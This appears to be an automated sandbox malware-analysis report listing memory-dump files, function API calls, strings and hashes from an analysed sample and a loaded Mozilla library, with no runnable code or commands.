Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: 8eac7459ba22e4550141d3105ca922b710d02309d246c332d13c2c4072e9b563
Instruction ID: 4d14187bc8f76dde7ee3824efdee62cc9ae517e8d6f6b851b4463eb89fd2503f
Opcode Fuzzy Hash: 8eac7459ba22e4550141d3105ca922b710d02309d246c332d13c2c4072e9b563
Instruction Fuzzy Hash: 23E01A31A4434C7BEB91EB90DC96FEE737C9B44B01F004295BA4C5A1C0DE70AB868B91

Function 003A1190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 003B78E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 003B7910
Part of subcall function 003B78E0: RtlAllocateHeap.NTDLL(00000000), ref: 003B7917
Part of subcall function 003B78E0: GetComputerNameA.KERNEL32(?,00000104), ref: 003B792F

Part of subcall function 003B7850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,003A11B7), ref: 003B7880
Part of subcall function 003B7850: RtlAllocateHeap.NTDLL(00000000), ref: 003B7887
Part of subcall function 003B7850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 003B789F

ExitProcess.KERNEL32 ref: 003A11C6

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: Heap$Process$AllocateName$ComputerExitUser
String ID:
API String ID: 3550813701-0
Opcode ID: 30cef3d5565af70f0c8abca88399ab653f6597f6d3a3736488fbafb7abcfbecf
Instruction ID: 25ea1145ffc0a592730260f8e8cdc3a1da93bffc3d9e43a422f28dbc1ac1a2f1
Opcode Fuzzy Hash: 30cef3d5565af70f0c8abca88399ab653f6597f6d3a3736488fbafb7abcfbecf
Instruction Fuzzy Hash: FBE012B591430553CE0573B0AC4BB6A379CDB6538DF050425FB09DA502FA25F905D566

Function 003B8E30 Relevance: 1.3, APIs: 1, Instructions: 35memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,-00000001), ref: 003B8E52

Memory Dump Source

Source File: 00000000.00000002.1752846312.00000000003A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003A0000, based on PE: true

Associated: 00000000.00000002.1752823658.00000000003A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000425000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000428000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000042F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000432000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000451000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000045D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000048F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000545000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.0000000000565000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.000000000056B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1752846312.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000005FE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000078C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000874000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.0000000000894000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.000000000089B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753207219.00000000008AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753454051.00000000008AB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753638589.0000000000A4E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753659356.0000000000A4F000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3a0000_file.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: a584aff19bbfbffc680f1461037be90871baaa72065a8448490bf5ccae71e79d
Instruction ID: 8038219e5683651b3892e3671d63b903052c84310927b7068fa6d40590830874
Opcode Fuzzy Hash: a584aff19bbfbffc680f1461037be90871baaa72065a8448490bf5ccae71e79d
Instruction Fuzzy Hash: DB01CD34A04108EFDB05CF98C5957EC7BB9EF04308F288498DA056B751C775AF94DB95

Non-executed Functions

Function 6CCA5440 Relevance: 140.6, APIs: 54, Strings: 26, Instructions: 587threadtimeCOMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6CCA5492
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CCA54A8
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CCA54BE
__Init_thread_footer.LIBCMT ref: 6CCA54DB

Part of subcall function 6CCCAB3F: EnterCriticalSection.KERNEL32(6CD1E370,?,?,6CC93527,6CD1F6CC,?,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB49
Part of subcall function 6CCCAB3F: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC93527,6CD1F6CC,?,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCAB7C

Part of subcall function 6CCCCBE8: GetCurrentProcess.KERNEL32(?,6CC931A7), ref: 6CCCCBF1
Part of subcall function 6CCCCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC931A7), ref: 6CCCCBFA

GetCurrentThreadId.KERNEL32 ref: 6CCA54F9
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6CCA5516
GetCurrentThreadId.KERNEL32 ref: 6CCA556A
AcquireSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCA5577
moz_xmalloc.MOZGLUE(00000070), ref: 6CCA5585
?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6CCA5590
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6CCA55E6
ReleaseSRWLockExclusive.KERNEL32(6CD1F4B8), ref: 6CCA5606
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CCA5616

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

GetCurrentThreadId.KERNEL32 ref: 6CCA563E
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCA5646
exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6CCA567C
free.MOZGLUE(?), ref: 6CCA56AE

Part of subcall function 6CCB5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6CCB5EDB
Part of subcall function 6CCB5E90: memset.VCRUNTIME140(6CCF7765,000000E5,55CCCCCC), ref: 6CCB5F27
Part of subcall function 6CCB5E90: LeaveCriticalSection.KERNEL32(?), ref: 6CCB5FB2

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6CCA56E8
GetCurrentThreadId.KERNEL32 ref: 6CCA5707
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6CCA570F
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6CCA5729
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6CCA574E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6CCA576B
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6CCA5796
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6CCA57B3
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6CCA57CA

Strings

GeckoMain, xrefs: 6CCA5554, 6CCA55D5
- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6CCA5D2B
[I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6CCA5717
- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6CCA5D01
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6CCA548D
MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6CCA5724
[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6CCA5B38
vchost.exeMemory Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost, xrefs: 6CCA57BC
MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6CCA57C5
[I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6CCA5BBE
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6CCA5AC9
[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6CCA584E
MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6CCA54A3
MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6CCA57AE
[I %d/%d] profiler_init, xrefs: 6CCA564E
MOZ_PROFILER_STARTUP, xrefs: 6CCA55E1
- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6CCA5D1C
MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6CCA56E3
- MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6CCA5CF9
MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6CCA5766
MOZ_BASE_PROFILER_LOGGING, xrefs: 6CCA54B9
MOZ_PROFILER_STARTUP_DURATION, xrefs: 6CCA5749
[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6CCA5C56
MOZ_BASE_PROFILER_HELP, xrefs: 6CCA5511
MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6CCA5791
- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6CCA5D24

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init$vchost.exeMemory Compressionsvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exesvchost.exespoolsv.exesvchost.exesvchost.exesvchost.exesvchost
API String ID: 3686969729-1615172861
Opcode ID: a1bddf1191e7c98fab44803d452362f1475016e9a7e4f97efda9c59f8d406deb
Instruction ID: fb27514eb8a561072fa39f58e19fd429dfc59717bca50c900935e932cc2925ae
Opcode Fuzzy Hash: a1bddf1191e7c98fab44803d452362f1475016e9a7e4f97efda9c59f8d406deb
Instruction Fuzzy Hash: C12213B4A08B019FF7009FB5941975A77B8AF86308F048529FA4697F91FB31D84ACB53

Function 6CCA6C80 Relevance: 95.2, APIs: 50, Strings: 4, Instructions: 727encryptionfileCOMMON

Download Yara Rule

APIs

CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CCA6CCC
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CCA6D11
moz_xmalloc.MOZGLUE(0000000C), ref: 6CCA6D26

Part of subcall function 6CCACA10: malloc.MOZGLUE(?), ref: 6CCACA26

memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6CCA6D35
CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6CCA6D53
CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6CCA6D73
free.MOZGLUE(00000000), ref: 6CCA6D80
CertGetNameStringW.CRYPT32 ref: 6CCA6DC0
moz_xmalloc.MOZGLUE(00000000), ref: 6CCA6DDC
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CCA6DEB
CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6CCA6DFF
CertFreeCertificateContext.CRYPT32(00000000), ref: 6CCA6E10
CryptMsgClose.CRYPT32(00000000), ref: 6CCA6E27
CertCloseStore.CRYPT32(00000000,00000000), ref: 6CCA6E34
CreateFileW.KERNEL32 ref: 6CCA6EF9
moz_xmalloc.MOZGLUE(00000000), ref: 6CCA6F7D
memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6CCA6F8C
memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6CCA709D
CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6CCA7103
free.MOZGLUE(00000000), ref: 6CCA7153
CloseHandle.KERNEL32(?), ref: 6CCA7176
__Init_thread_footer.LIBCMT ref: 6CCA7209
__Init_thread_footer.LIBCMT ref: 6CCA723A
__Init_thread_footer.LIBCMT ref: 6CCA726B
__Init_thread_footer.LIBCMT ref: 6CCA729C
__Init_thread_footer.LIBCMT ref: 6CCA72DC
__Init_thread_footer.LIBCMT ref: 6CCA730D
memset.VCRUNTIME140(?,00000000,00000110), ref: 6CCA73C2
VerSetConditionMask.NTDLL ref: 6CCA73F3
VerSetConditionMask.NTDLL ref: 6CCA73FF
VerSetConditionMask.NTDLL ref: 6CCA7406
VerSetConditionMask.NTDLL ref: 6CCA740D
VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6CCA741A
moz_xmalloc.MOZGLUE(?), ref: 6CCA755A
memset.VCRUNTIME140(00000000,00000000,?), ref: 6CCA7568
CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6CCA7585
_wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6CCA7598
free.MOZGLUE(00000000), ref: 6CCA75AC

Part of subcall function 6CCCAB89: EnterCriticalSection.KERNEL32(6CD1E370,?,?,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284), ref: 6CCCAB94
Part of subcall function 6CCCAB89: LeaveCriticalSection.KERNEL32(6CD1E370,?,6CC934DE,6CD1F6CC,?,?,?,?,?,?,?,6CC93284,?,?,6CCB56F6), ref: 6CCCABD1

Strings

(, xrefs: 6CCA768A
SHA256, xrefs: 6CCA6EC0
wintrust.dll, xrefs: 6CCA72CD
CryptCATAdminReleaseCatalogContext, xrefs: 6CCA72C8

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
API String ID: 3256780453-3980470659
Opcode ID: 01cc2d5ce36010761d16f1c505fb1123f98822c09f03d9566b878f077c389945
Instruction ID: 1ac1d1f42e7504315a7328c02273903a9d956dc79b4d6b7ca26ab7d64f22fba3
Opcode Fuzzy Hash: 01cc2d5ce36010761d16f1c505fb1123f98822c09f03d9566b878f077c389945
Instruction Fuzzy Hash: 6852A6B1A002159FFB21DF64CC89BAAB7BDFF45704F104199E60997A40EB70AE86CF51

Function 6CCD0DD0 Relevance: 83.9, APIs: 36, Strings: 10, Instructions: 3368COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6CCD0F1F
LeaveCriticalSection.KERNEL32(?), ref: 6CCD0F99
memcpy.VCRUNTIME140(?,?,?), ref: 6CCD0FB7
EnterCriticalSection.KERNEL32(?), ref: 6CCD0FE9
memset.VCRUNTIME140(?,000000E5,00000000), ref: 6CCD1031
LeaveCriticalSection.KERNEL32(?), ref: 6CCD10D0
EnterCriticalSection.KERNEL32(?), ref: 6CCD117D
memset.VCRUNTIME140(?,000000E5,?), ref: 6CCD1C39
EnterCriticalSection.KERNEL32(6CD1E744), ref: 6CCD3391
LeaveCriticalSection.KERNEL32(6CD1E744), ref: 6CCD33CD
LeaveCriticalSection.KERNEL32(?), ref: 6CCD3431
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CCD3437

Strings

<jemalloc>, xrefs: 6CCD3941, 6CCD39F1
MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6CCD37D2
MOZ_RELEASE_ASSERT(mNode), xrefs: 6CCD3559, 6CCD382D, 6CCD3848
MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6CCD3793
: (malloc) Unsupported character in malloc options: ', xrefs: 6CCD3A02
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6CCD37A8
MALLOC_OPTIONS, xrefs: 6CCD35FE
Compile-time page size does not divide the runtime one., xrefs: 6CCD3946
MOZ_CRASH(), xrefs: 6CCD3950
MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6CCD37BD

Memory Dump Source

Source File: 00000000.00000002.1777865080.000000006CC91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC90000, based on PE: true

Associated: 00000000.00000002.1777842679.000000006CC90000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777933262.000000006CD0D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777961170.000000006CD1E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1777979205.000000006CD22000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cc90000_file.jbxd

Similarity

API ID: CriticalSection$EnterLeave$memset$_errnomemcpy
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()$MOZ_RELEASE_ASSERT(!aArena || arena == aArena)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?)$MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.)$MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?)$MOZ_RELEASE_ASSERT(mNode)
API String ID: 3040639385-4173974723
Opcode ID: e9827765546471bca38b7b62aae379d1935ff37f2c8b585e0fd5d3052ca7d3cf
Instruction ID: cefd283aeeca80036ae9cd5990b2d701be02d7d6eaa6225e89d1c60de2ecdeee
Opcode Fuzzy Hash: e9827765546471bca38b7b62aae379d1935ff37f2c8b585e0fd5d3052ca7d3cf
Instruction Fuzzy Hash: BB537B71A057018FD304CF29C550616FBF1BF89328F2AC66DE9699BB91E771E842CB81

Function 6CCF34A0 Relevance: 61.0, APIs: 33, Strings: 1, Instructions: 1467COMMON

Download Yara Rule

APIs

floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3527
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF355B
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF35BC
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF35E0
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF363A
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3693
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF36CD
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3703
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF373C
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF3775
floor.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CCF378F
